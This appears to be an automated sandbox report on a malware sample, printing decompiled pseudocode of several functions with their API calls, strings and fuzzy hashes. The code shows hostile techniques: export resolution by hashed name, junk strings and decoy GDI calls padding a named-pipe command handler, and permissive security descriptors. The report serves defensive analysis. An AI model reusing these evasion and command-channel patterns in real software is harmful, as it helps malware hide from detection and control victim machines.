Function 00ECE47B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00ECE47B() {
				int _v8;
				char _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				short _v28;
				void* _v32;
				short _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				int _v84;
				intOrPtr _v96;
				intOrPtr _v100;
				void _v104;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				intOrPtr _t79;
				struct _SECURITY_DESCRIPTOR* _t81;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t94;
				intOrPtr _t96;
				intOrPtr _t101;
				intOrPtr _t102;

				_t94 = 8;
				memset( &_v104, 0, _t94 << 2);
				_push( &_v16);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push( &_v32);
				_t64 =  *0xef56d4; // 0x520f880
				_v8 = 0;
				_v24 = 1;
				_v40 = 0;
				_v36 = 0xf00;
				_v32 = 0;
				_v28 = 0x100;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(_t64 + 0xc))() == 0) {
					L11:
					if(_v12 != 0) {
						_t43 =  &_v12; // 0xece332
						_t73 =  *0xef56d4; // 0x520f880
						 *((intOrPtr*)(_t73 + 0x10))( *_t43);
					}
					if(_v16 != 0) {
						_t71 =  *0xef56d4; // 0x520f880
						 *((intOrPtr*)(_t71 + 0x10))(_v16);
					}
					if(_v8 != 0) {
						_t69 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t69 + 0x34))(_v8);
					}
					if(_v20 != 0) {
						_t67 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t67 + 0x34))(_v20);
					}
					L22:
					return _v8;
				}
				_t101 = 2;
				_v76 = _v16;
				_t76 =  *0xef56a8; // 0xf00000
				_t102 = 3;
				_v104 = 0x1fffff;
				_v100 = _t101;
				_v96 = _t102;
				_v84 = 0;
				_v80 = 5;
				_t96 =  *((intOrPtr*)(_t76 + 4));
				if(_t96 != 6 ||  *((intOrPtr*)(_t76 + 8)) < _t101) {
					if(_t96 < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_t24 =  &_v12; // 0xece332
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t101);
					_push(_t101);
					_push( &_v40);
					_t90 =  *0xef56d4; // 0x520f880
					if( *((intOrPtr*)(_t90 + 0xc))() == 0) {
						goto L11;
					} else {
						_t27 =  &_v12; // 0xece332
						_t92 =  *_t27;
						if(_t92 > 0) {
							_v72 = 0x1fffff;
							_v68 = _t101;
							_v64 = _t102;
							_v52 = 0;
							_v48 = _t101;
							_v44 = _t92;
							_v24 = _t101;
						}
						L7:
						_push( &_v20);
						_push(0);
						_push( &_v104);
						_push(_v24);
						_t79 =  *0xef56d4; // 0x520f880, executed
						if( *((intOrPtr*)(_t79 + 8))() != 0) {
							goto L11;
						}
						_t81 = LocalAlloc(0x40, 0x14);
						_v8 = _t81;
						if(_t81 == 0 || InitializeSecurityDescriptor(_t81, 1) == 0 || SetSecurityDescriptorDacl(_v8, 1, _v20, 0) == 0) {
							goto L11;
						} else {
							if(_v12 != 0) {
								_t55 =  &_v12; // 0xece332
								_t86 =  *0xef56d4; // 0x520f880
								 *((intOrPtr*)(_t86 + 0x10))( *_t55);
							}
							_t84 =  *0xef56d4; // 0x520f880
							 *((intOrPtr*)(_t84 + 0x10))(_v16);
							goto L22;
						}
					}
				}
			}

0x00ece486
0x00ece48e
0x00ece493
0x00ece494
0x00ece495
0x00ece496
0x00ece497
0x00ece498
0x00ece499
0x00ece49a
0x00ece49e
0x00ece49f
0x00ece4a3
0x00ece4a4
0x00ece4a9
0x00ece4ac
0x00ece4af
0x00ece4b2
0x00ece4b8
0x00ece4bb
0x00ece4c1
0x00ece4c4
0x00ece4c7
0x00ece4cf
0x00ece596
0x00ece599
0x00ece59b
0x00ece59e
0x00ece5a3
0x00ece5a3
0x00ece5a9
0x00ece5ae
0x00ece5b3
0x00ece5b3
0x00ece5b9
0x00ece5be
0x00ece5c3
0x00ece5c3
0x00ece5c9
0x00ece5ce
0x00ece5d3
0x00ece5d3
0x00ece5f3
0x00ece5fa
0x00ece5fa
0x00ece4da
0x00ece4dd
0x00ece4e0
0x00ece4e5
0x00ece4e6
0x00ece4ed
0x00ece4f0
0x00ece4f3
0x00ece4f6
0x00ece4fd
0x00ece503
0x00ece50d
0x00000000
0x00000000
0x00000000
0x00ece50f
0x00ece50f
0x00ece50f
0x00ece513
0x00ece514
0x00ece515
0x00ece516
0x00ece517
0x00ece518
0x00ece519
0x00ece51b
0x00ece51c
0x00ece520
0x00ece521
0x00ece52b
0x00000000
0x00ece52d
0x00ece52d
0x00ece52d
0x00ece532
0x00ece534
0x00ece53b
0x00ece53e
0x00ece541
0x00ece544
0x00ece547
0x00ece54a
0x00ece54a
0x00ece54d
0x00ece550
0x00ece551
0x00ece555
0x00ece556
0x00ece559
0x00ece563
0x00000000
0x00000000
0x00ece569
0x00ece56f
0x00ece574
0x00000000
0x00ece5d8
0x00ece5db
0x00ece5dd
0x00ece5e0
0x00ece5e5
0x00ece5e5
0x00ece5eb
0x00ece5f0
0x00000000
0x00ece5f0
0x00ece574
0x00ece52b

APIs

LocalAlloc.KERNEL32(00000040,00000014), ref: 00ECE569
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00ECE579
SetSecurityDescriptorDacl.ADVAPI32(00EC2BAA,00000001,?,00000000), ref: 00ECE58C

Strings

2, xrefs: 00ECE59B, 00ECE5DD, 00ECE50F, 00ECE52D, 00ECE512

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: DescriptorSecurity$AllocDaclInitializeLocal
String ID: 2
API String ID: 1946635556-1279140107
Opcode ID: 82d1a0ac8a8caa7eefb7fc259396c760be1483473c0124f245d147ea83ee0b24
Instruction ID: 4caad069f4dc752dc1ef9ad7c0eb2e37e0ae470c9e467560457201d06739b13d
Opcode Fuzzy Hash: 82d1a0ac8a8caa7eefb7fc259396c760be1483473c0124f245d147ea83ee0b24
Instruction Fuzzy Hash: 4A51E6B1D00209EFDB20CF96D984EAEBBB9FF48305F55446AE515F6260D3B19E45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00ED70DA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED70DA(void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				char _v32;
				void* _v36;
				short _v548;
				intOrPtr _t47;
				signed int _t48;
				intOrPtr _t49;
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t85;

				_t85 = __fp0;
				_t78 = __edx;
				_t47 =  *0xef56e0; // 0x520f860
				_v16 = 0;
				_v36 = 0;
				_v28 = 0;
				_t48 =  *((intOrPtr*)(_t47 + 4))(_a4, 0, 2,  &_v12, 0xffffffff,  &_v16,  &_v36,  &_v28);
				if(_t48 == 0) {
					_v8 = 0;
					if(_v16 <= 0) {
						L9:
						_t49 =  *0xef56e0; // 0x520f860
						 *((intOrPtr*)(_t49 + 0xc))(_v12);
						return 0;
					}
					do {
						_t13 =  &_v32; // 0xed7272
						_v20 = 0;
						_v24 = 0;
						LookupAccountNameW(0,  *(_v12 + _v8 * 4), 0,  &_v20, 0,  &_v24, _t13); // executed
						_t72 = E00ECD239(_v20 + 1);
						if(_t72 != 0) {
							_t23 =  &_v32; // 0xed7272
							_v24 = 0x200;
							if(LookupAccountNameW(0,  *(_v12 + _v8 * 4), _t72,  &_v20,  &_v548,  &_v24, _t23) != 0) {
								E00EC9FB8(_v8, _t78, _t85,  *(_v12 + _v8 * 4), _t72, _a8);
								_t83 = _t83 + 0xc;
								Sleep(0xa);
							}
						}
						_v8 = _v8 + 1;
					} while (_v8 < _v16);
					goto L9;
				}
				return _t48 | 0xffffffff;
			}

0x00ed70da
0x00ed70da
0x00ed70f6
0x00ed7103
0x00ed7106
0x00ed7109
0x00ed710c
0x00ed7111
0x00ed711b
0x00ed7121
0x00ed71be
0x00ed71c1
0x00ed71c6
0x00000000
0x00ed71c9
0x00ed712f
0x00ed7132
0x00ed7143
0x00ed7146
0x00ed714d
0x00ed7159
0x00ed715e
0x00ed7163
0x00ed717a
0x00ed7189
0x00ed7198
0x00ed71a2
0x00ed71a7
0x00ed71a7
0x00ed7189
0x00ed71ad
0x00ed71b3
0x00000000
0x00ed71bd
0x00000000

APIs

LookupAccountNameW.ADVAPI32(00000000,00EC9A80,00000000,00F00000,00000000,00EC9A80,rr), ref: 00ED714D
LookupAccountNameW.ADVAPI32(00000000,00EC9A80,00000000,00F00000,?,00EC9A80,rr), ref: 00ED7185
Sleep.KERNELBASE(0000000A), ref: 00ED71A7

Strings

rr, xrefs: 00ED7132, 00ED7163, 00ED7135, 00ED7166

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AccountLookupName$Sleep
String ID: rr
API String ID: 1354157771-4030056062
Opcode ID: 93d2da1320751bde00a1fbfeea48f06895362421a7d01d32b74c27210cbb5779
Instruction ID: 19dd3ecf8e082be70ed3373414989ec817faddb5c8e649509c71c6bc69be92eb
Opcode Fuzzy Hash: 93d2da1320751bde00a1fbfeea48f06895362421a7d01d32b74c27210cbb5779
Instruction Fuzzy Hash: FD31DE72A01129AFDB11DFD4CC84DEEBBBCEF48354F11029AE515F6251D730AA06CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED03CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED03CA(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v80;
				intOrPtr _t48;
				intOrPtr _t49;
				_Unknown_base(*)()* _t52;
				signed int _t56;
				struct HINSTANCE__* _t62;
				void* _t66;
				CHAR* _t68;
				intOrPtr _t69;
				void* _t74;
				char _t77;
				void* _t80;
				_Unknown_base(*)()* _t82;
				void* _t84;
				void* _t87;
				void* _t88;
				void* _t89;

				_t69 = _a4;
				_t48 =  *((intOrPtr*)(_t69 + 0x3c)) + _t69;
				_v16 = _t48;
				_t49 =  *((intOrPtr*)(_t48 + 0x78));
				if(_t49 != 0) {
					_v8 = _v8 & 0x00000000;
					_t84 = _t49 + _t69;
					_t80 =  *((intOrPtr*)(_t84 + 0x20)) + _t69;
					_t66 =  *((intOrPtr*)(_t84 + 0x24)) + _t69;
					_v12 =  *((intOrPtr*)(_t84 + 0x1c)) + _t69;
					if( *((intOrPtr*)(_t84 + 0x18)) <= 0) {
						L18:
						_t52 = 0;
					} else {
						while(1) {
							_t56 = E00ECEF54(0,  *((intOrPtr*)(_t80 + _v8 * 4)) + _t69, E00ECFE78( *((intOrPtr*)(_t80 + _v8 * 4)) + _t69));
							_t89 = _t89 + 0xc;
							if((_t56 ^ 0x218fe95b) == _a8) {
								break;
							}
							_v8 = _v8 + 1;
							if(_v8 <  *((intOrPtr*)(_t84 + 0x18))) {
								_t69 = _a4;
								continue;
							} else {
								goto L18;
							}
							goto L19;
						}
						_t52 =  *((intOrPtr*)(_v12 + ( *(_t66 + _v8 * 2) & 0x0000ffff) * 4)) + _a4;
						if(_t52 >= _t84 && _t52 <  *((intOrPtr*)(_v16 + 0x7c)) + _t84) {
							_t74 = 0;
							_t68 = _t52;
							_t82 = _t52;
							_t87 =  &_v80 - _t52;
							while(1) {
								_t77 =  *_t82;
								if(_t77 == 0x2e || _t77 == 0) {
									break;
								}
								_t74 = _t74 + 1;
								 *((char*)(_t87 + _t82)) = _t77;
								_t82 = _t82 + 1;
								if(_t74 < 0x40) {
									continue;
								}
								break;
							}
							 *((char*)(_t88 + _t74 - 0x4c)) = 0x2e;
							 *((char*)(_t88 + _t74 - 0x4b)) = 0x64;
							 *((char*)(_t88 + _t74 - 0x4a)) = 0x6c;
							 *((char*)(_t88 + _t74 - 0x49)) = 0x6c;
							 *((char*)(_t88 + _t74 - 0x48)) = 0;
							if( *((char*)(_t74 + _t52)) != 0) {
								_t45 = _t52 + 1; // 0x2
								_t68 = _t74 + _t45;
							}
							_t46 =  &_v80; // 0x2e
							_t62 = LoadLibraryA(_t46); // executed
							if(_t62 == 0) {
								goto L18;
							} else {
								_t52 = GetProcAddress(_t62, _t68);
								if(_t52 == 0) {
									goto L18;
								}
							}
						}
					}
					L19:
					return _t52;
				} else {
					return _t49;
				}
			}

0x00ed03d0
0x00ed03d6
0x00ed03d8
0x00ed03db
0x00ed03e0
0x00ed03e4
0x00ed03ea
0x00ed03f9
0x00ed03fb
0x00ed0401
0x00ed0404
0x00ed04bd
0x00ed04bd
0x00ed040a
0x00ed040f
0x00ed0421
0x00ed042b
0x00ed0431
0x00000000
0x00000000
0x00ed0433
0x00ed043c
0x00ed040c
0x00000000
0x00ed043e
0x00000000
0x00ed043e
0x00000000
0x00ed043c
0x00ed044d
0x00ed0452
0x00ed0463
0x00ed0465
0x00ed0467
0x00ed0469
0x00ed046b
0x00ed046b
0x00ed0470
0x00000000
0x00000000
0x00ed0476
0x00ed0477
0x00ed047a
0x00ed047e
0x00000000
0x00000000
0x00000000
0x00ed047e
0x00ed0484
0x00ed0489
0x00ed048e
0x00ed0493
0x00ed0498
0x00ed049d
0x00ed049f
0x00ed049f
0x00ed049f
0x00ed04a3
0x00ed04a7
0x00ed04af
0x00000000
0x00ed04b1
0x00ed04b3
0x00ed04bb
0x00000000
0x00000000
0x00ed04bb
0x00ed04af
0x00ed0452
0x00ed04bf
0x00ed04c3
0x00ed03e3
0x00ed03e3
0x00ed03e3

Strings

.dll, xrefs: 00ED04A3, 00ED04A6

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .dll
API String ID: 0-2738580789
Opcode ID: 352e40cacc4e825d6f949b8c9330dc84a713a342aacaa31d26a212a744a050b6
Instruction ID: 8156254606457ea43905c59875058b6f5fc7141b1ce3607f1713550840393281
Opcode Fuzzy Hash: 352e40cacc4e825d6f949b8c9330dc84a713a342aacaa31d26a212a744a050b6
Instruction Fuzzy Hash: 9131AB30A002449FDB20CF68D884BAD7BE5EF04348F28546EEA55E7302E335EE4ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EC32C4, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC32C4(void* __eflags) {
				intOrPtr _t2;
				void* _t6;

				_t2 =  *0xef56c8; // 0x520f6c8
				 *((intOrPtr*)(_t2 + 0x108))(1, E00EC355F);
				E00EC4531(_t6); // executed
				return 0;
			}

0x00ec32c4
0x00ec32d0
0x00ec32d6
0x00ec32dd

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,00EC355F,00EC32BF), ref: 00EC32D0

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 7da6257fa62cea61f3af1949c9ab51d9076298e601f43a33dc96d702041fe9e9
Instruction ID: 245b3c7d10d7dff8eff2a7a83710403cc6bf7a17488bdb15e80dc241875aef5c
Opcode Fuzzy Hash: 7da6257fa62cea61f3af1949c9ab51d9076298e601f43a33dc96d702041fe9e9
Instruction Fuzzy Hash: 1EB092B12412009FC340A7749D0AF9832909B50702F0210A4B244E60B6CA9255829A00

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2C43, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 255
pipeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EC2C43() {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v33;
				char _v48;
				char _v49;
				char _v64;
				char _v65;
				char _v80;
				short _v144;
				char _v272;
				char _v276;
				short _v340;
				void* __esi;
				void* _t65;
				intOrPtr _t69;
				signed short* _t75;
				void* _t78;
				char _t85;
				intOrPtr _t87;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t97;
				intOrPtr _t103;
				long _t112;
				void* _t123;
				signed short* _t143;
				void* _t147;
				signed int _t150;
				void* _t151;
				intOrPtr* _t153;
				void* _t155;
				void* _t156;
				void* _t157;

				_v24 = 0;
				GetLastError();
				_t65 = E00ECFE78("cAvBrlnMFqAT2BN31CWMq,4BRqt TqmuaxBM.uWHDCyU2NVoHG  xlKfxmH1cG  fc HxWxLvvr0wvDX rR2aFooS0U,aq wKQRVNP.VYCB4GBFcZeD0d2aIDE5mZ0J4osrBcqJtX tFO YpWJN4Kjr,wUyremLF uf a X8Wdve3d9FJ dGwx7CTbmxbmtH 3g lxz4Ibo WJNqke  kyB.avIoMm1QwcMuqQQa9q6AoG paUGbz pUw467bhxHSU2ZL LcqJ,.dbZ0P.uZoVcgnmDGk4YjE8oTS,CCNn5KQK78cjcKL UW3yegIfV cbnTWvXcdR.rAE4 IeZiRKEmxL9rmvLTNU06HlRIkwnSyggDdZpttIh1b4.AXqg2NMv4y2aebKl0nNsrbyMFdmeYkh6vmAYoyhQzdJ55,guF59.uCdsOa,bIlh8PG.2OMeMBz Fhj0eCnUCPREV3z HglccjIXC 0L2Jry07gPSwtXRC8U,zZM,T1AU3fHIL5g 3.HI.Tx4VkwcdBJf9q4udEWBs5KQq763p93N rsQl75co,0xEE5O.lIPH1jJ19nD8wApk.GtfLIalgO5oz8LYcfn ,FrEt5di6WJ9fsc 7.zlYEiG1DOqoKeIXcJQP2JsS6JhZbdoJA aB.nF1bhl,yl.TRHmO s6d");
				_t151 = 0xf;
				if(_t65 <= _t151) {
					_t151 = _t65;
				}
				_v33 = 0;
				_v8 = 0;
				if(_t151 <= 0) {
					L4:
					_v20 = 0;
					if(ConnectNamedPipe( *0xef56a0, 0) != 0) {
						L6:
						_push(0);
						_push( &_v20);
						_t69 =  *0xef56c8; // 0x520f6c8
						_push(0x80000);
						_push( *0xef569c);
						_push( *0xef56a0);
						if( *((intOrPtr*)(_t69 + 0x88))() == 0 || _v20 == 0) {
							GetLastError();
							Arc(0, 0x20, 0x40, 0x5a, 0x11, 0x1a, 0x33, 0x32, 0x54);
						} else {
							_t75 =  *0xef569c; // 0x5000020
							_t123 = ( *_t75 & 0x0000ffff) - 1;
							if(_t123 == 0) {
								_t20 =  &(_t75[4]); // 0x5000028
								_t153 = E00ECEB28(_t20, 0x20, 1,  &_v12);
								_t157 = _t157 + 0xc;
								_v16 = _t153;
								GetLastError();
								_t78 = E00ECFE78(".LRtp,cc9gtdJEIf6AP uPceVdj2X5Y30jXnkK3qzs79Doak51h0R2pVSaE95hmYYy YRV33DEZ3U gBG.D3UwK gaLBCZzLEhzg,BfFvMTpWilDDQTwT7V45QE.BLmK4wY8h0H5HZstD2 wuRO kVAxb1D jXeKVe9 67z703KGjJ4 0J2ZkiKiXy4AUD m49dZQBKmKG.28NFAsRKiBF6,RD8xTrNjJgms ,MOTEas3zuKmCo c5MihDJ FoPtgdFiayEBr7HNaPWrB1PRNq5zQzs4gQ7RCDBTwoFuA 9rXtwsFoZwX.AdWVN7aM6nPoZyF5a6tn.XIXUuXhI9xhSXS,AZnn eEfu4JVc4kCIEAKs77BSins YrCgb o8wj9X aqOR1IQ3 JUuuGbPmWx muvDadqrIJp66Je.hZrfhGmq0tIqIg36Uw71YhLfC23vDs04agFuTFElMCNIh VjIAENrSFreMCAvUMqsJN1I6PBLCXL sbtdxRCs2i0jVXtrvW1vqJ7H f,5GsYeTX0 gl,VgTCJGSvJpfajIQpJyaZJM2UgRsvvnVq6tM THv7uX7L8ehn5W26RnkC357beS,LXX");
								_t147 = 0xf;
								if(_t78 <= _t147) {
									_t147 = _t78;
								}
								_v65 = 0;
								_v8 = 0;
								if(_t147 <= 0) {
									L15:
									if(_t153 == 0) {
										L27:
										_t143 =  *0xef569c; // 0x5000020
										E00ECE0FE( &_v272, 0x80,  &(_t143[4]));
										Arc(0, 6, 0x15, 0x2c, 0x5d, 3, 0x61, 8, 0x54);
										E00ED110E(0x84, 2,  &_v276);
										goto L29;
									}
									_t85 = _v12;
									_t150 = 1;
									if(_t85 <= 1) {
										_t87 = E00EC53ED(E00ECE1B6( *_t153), 0, 0, 0);
										_t157 = _t157 + 0x10;
										_v276 = _t87;
										goto L27;
									}
									_v28 = _t85 - 1;
									_t90 = E00ECD239(_t85 - 1 << 2);
									_v32 = _t90;
									if(_t90 == 0) {
										goto L27;
									}
									if(_v12 <= 1) {
										L21:
										_t92 = E00EC53ED(E00ECE1B6( *_t153), _v32, _v28, 0);
										_t157 = _t157 + 0x10;
										_v276 = _t92;
										ArcTo(0, 0x52, 0x56, 0x5d, 0x4c, 0x22, 0x13, 0x19, 0x18);
										E00ECEA28( &_v12,  &_v16);
										GetLastError();
										_t97 = E00ECFE78("04kNDtOwMXwk .i 7QkQO6BqbGkwJn XE,hJVrGHfQbyq wMOknxGI8qhCF3iXhls .dcUy.LzHDzquPOYhm4,XXBTZsMUP3RcE.uDKaF6zxmlIJ6Vb6.f.ukUvP1E5SxVsONlRwVZS0EZB0r3ky0SFhyBAb8WlyicWmq2F6Lnjhy tsinRl5F36mG4Hf6gkrYe82CpecqCjx iO75oCm9CglWGAWIn3JW,EIiw8hZLYmk08y FrZS.lEpd9VXYvrWmN,F7qGlF887PfIRQU.MaTrwADDN5GQYSsO2EctI9je50gf3xBOxGJ4TA.curqmTpc3ntnXB4WjLYBvqQc9WETsvBP0tzUQkJZErGL2,evWoWCBbFkqFylJJGqYOebjg0CHqYq8zFkoCN.So.hs4,v2KkitnG b9e2xMyu63IY  kxiVg2B1anKiCGblpnAwF,TjVuFQisD,I,h48bt3g MhbJKK9sSKMtxOntiuO41PMdZW5fMzyJz2ySJens7fZvewuQoGg91,aj3wqSwqgdqt g4FxY,HsuTJ0FnMBRJLRC4BGOF35B.FVSpmlFvxSYoCws98cUD6JFF.r67E1e2mIwKoD7.8melX51Txj ODyG,DZlrPbXJTFa9 Ph3fzLVzHOHhoffEOVDWGpolC2d.mQ63Ns0twmbHB pJ7MJpgWeFkZ7tnDmBQC KCnN62fDIN97Cy966V2E 5AixPRvOUCF4ZDCh1T.i3 mM4yt pCVmRs8K5OM.Z1O0IQysJtQWTDxHWb1sN3lT  .vk5OiSpvXHlCx5Es5a7RIqPrQA0knoinvGjuZBlpKF7e ABXlmZpFRpRwyuHpDEJUkSYCAvL94ABQMvyt Evn,lduH,O6HcOz lA 5.,JiZYuOE.bBsUxTDL,MEEMOt7Opa8gOaOzHA5nCShbkgSqFr60.dAjkcA7wHRLp2SCiaMeJTCSMs,fXtsxK2Sf7yumwCSneCgB IQkWirHEgyTwa4,yGlUc2RDn1Ap.gRl.CTn5bH3Jz4AirBwKMs9ivE2hmuNm.1Lkl7uBO8uqnMYteYbFpevL5fja3W2kKUbwC7WjbPU2sfPJIbW .BDSCNs 40TJ C,wClom8cbUMZD 32Z3lErGesl7D.soNXMl Bfe1i2VfF,vjP2HW4hQleCkvuymfuRE3C5BKFU3Kc8vqwzafJRQ87d4LouTpuRfe1i14Kd 7or mO.dfMv9Z8uw4ot1emsTn 1 mEYQ8z84X  AraAKOX gD.H vBdm.n8pR0 q7halkemkGV6I5jtvG51.Jyuq B6wzlgKnIC3uFnxVpibp6 5p2k4B3gWvGXNEb48fHVnVTlNUsvRM1 .bf2OdN1zGCd2F5FSKQQVHXuac3LUS, wBQGRLnCkyUGsOWcxGI1lA Fsi32zesGV5qMS2XP1cVJxtrcEYekdlJle.E51KsTeJ09gdhag,wMKDEHAF kEW2yiWHf6IPVn00 ZTegt0ZBg pzK FiL9MtR.w72jx1 WHZzOPIsmNa0 I2tX HJAX5YW2 rCBuMW 0f9msN iq nPK66f HrhIrQ 1Ae4OiOp.AK1Z PGwnfhvx6r83wvjFyYUWY4iUP4mFoB2Fzl MQFFle.p9Xk1WOo,tTllMeyaE8pK4S3OHk1YSKvlQUonxE1ckGFNI.FbUprQjZ7pqIpBkgkvrBFUvqe");
										_t155 = 0xf;
										if(_t97 <= _t155) {
											_t155 = _t97;
										}
										_v49 = 0;
										_v8 = 0;
										if(_t155 > 0) {
											do {
												 *((char*)(_t156 + _v8 - 0x3c)) = _v8 + 0x42;
												MultiByteToWideChar(0, 0,  &_v64, 0xffffffff,  &_v144, 0x20);
												_v8 = _v8 + 1;
											} while (_v8 < _t155);
										}
										goto L27;
									}
									_v8 = _t90;
									do {
										_t103 = E00ECEA79(E00ECFE78( *((intOrPtr*)(_t153 + _t150 * 4))),  *((intOrPtr*)(_t153 + _t150 * 4)));
										_v8 = _v8 + 4;
										_t150 = _t150 + 1;
										 *_v8 = _t103;
									} while (_t150 < _v12);
									goto L21;
								} else {
									do {
										 *((char*)(_t156 + _v8 - 0x4c)) = _v8 + 0x42;
										MultiByteToWideChar(0, 0,  &_v80, 0xffffffff,  &_v144, 0x20);
										_v8 = _v8 + 1;
									} while (_v8 < _t147);
									goto L15;
								}
							}
							if(_t123 == 3) {
								E00ED110E(0, 5, 0);
								 *0xef578c = 1;
								_v24 = 1;
							}
						}
						goto L29;
					}
					_t112 = GetLastError();
					asm("sbb eax, eax");
					if( ~(_t112 - 0x217) + 1 == 0) {
						goto L30;
					}
					goto L6;
				} else {
					do {
						 *((char*)(_t156 + _v8 - 0x2c)) = _v8 + 0x42;
						MultiByteToWideChar(0, 0,  &_v48, 0xffffffff,  &_v340, 0x20);
						_v8 = _v8 + 1;
					} while (_v8 < _t151);
					do {
						goto L4;
						L29:
						DisconnectNamedPipe( *0xef56a0);
					} while (_v24 == 0);
					L30:
					return 0;
				}
			}

0x00ec2c57
0x00ec2c5a
0x00ec2c61
0x00ec2c69
0x00ec2c6c
0x00ec2c6e
0x00ec2c6e
0x00ec2c70
0x00ec2c73
0x00ec2c78
0x00ec2ca3
0x00ec2caf
0x00ec2cba
0x00ec2cce
0x00ec2cce
0x00ec2cd2
0x00ec2cd3
0x00ec2cd8
0x00ec2cdd
0x00ec2ce3
0x00ec2cf1
0x00ec2ede
0x00ec2ef1
0x00ec2d00
0x00ec2d00
0x00ec2d08
0x00ec2d09
0x00ec2d38
0x00ec2d40
0x00ec2d42
0x00ec2d45
0x00ec2d48
0x00ec2d4f
0x00ec2d57
0x00ec2d5a
0x00ec2d5c
0x00ec2d5c
0x00ec2d5e
0x00ec2d61
0x00ec2d66
0x00ec2d91
0x00ec2d93
0x00ec2e91
0x00ec2e91
0x00ec2ea5
0x00ec2ebb
0x00ec2ecf
0x00000000
0x00ec2edb
0x00ec2d99
0x00ec2d9e
0x00ec2da1
0x00ec2e83
0x00ec2e88
0x00ec2e8b
0x00000000
0x00ec2e8b
0x00ec2da8
0x00ec2daf
0x00ec2db5
0x00ec2dba
0x00000000
0x00000000
0x00ec2dc3
0x00ec2de8
0x00ec2df7
0x00ec2dfc
0x00ec2e10
0x00ec2e16
0x00ec2e23
0x00ec2e29
0x00ec2e34
0x00ec2e3c
0x00ec2e3f
0x00ec2e41
0x00ec2e41
0x00ec2e43
0x00ec2e46
0x00ec2e4b
0x00ec2e4d
0x00ec2e55
0x00ec2e68
0x00ec2e6e
0x00ec2e71
0x00ec2e76
0x00000000
0x00ec2e4b
0x00ec2dc5
0x00ec2dc8
0x00ec2dd2
0x00ec2ddc
0x00ec2de0
0x00ec2de1
0x00ec2de3
0x00000000
0x00ec2d68
0x00ec2d68
0x00ec2d70
0x00ec2d83
0x00ec2d89
0x00ec2d8c
0x00000000
0x00ec2d68
0x00ec2d66
0x00ec2d0e
0x00ec2d19
0x00ec2d23
0x00ec2d28
0x00ec2d28
0x00ec2d0e
0x00000000
0x00ec2cf1
0x00ec2cbc
0x00ec2cc5
0x00ec2cc8
0x00000000
0x00000000
0x00000000
0x00ec2c7a
0x00ec2c7a
0x00ec2c82
0x00ec2c95
0x00ec2c9b
0x00ec2c9e
0x00ec2ca3
0x00000000
0x00ec2ef7
0x00ec2efd
0x00ec2f03
0x00ec2f0e
0x00ec2f12
0x00ec2f12

APIs

GetLastError.KERNEL32 ref: 00EC2C5A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC2C95
ConnectNamedPipe.KERNELBASE(00000000), ref: 00EC2CB2
GetLastError.KERNEL32 ref: 00EC2CBC
GetLastError.KERNEL32 ref: 00EC2D48
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC2D83
ArcTo.GDI32(00000000,00000052,00000056,0000005D,0000004C,00000022,00000013,00000019,00000018), ref: 00EC2E16
GetLastError.KERNEL32 ref: 00EC2E29
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC2E68
Arc.GDI32(00000000,00000006,00000015,0000002C,0000005D,00000003,00000061,00000008,00000054), ref: 00EC2EBB

Part of subcall function 00ECE1B6: SetLastError.KERNEL32(0000000D,00000000,00EEF83C,00ED18C8), ref: 00ECE1F1

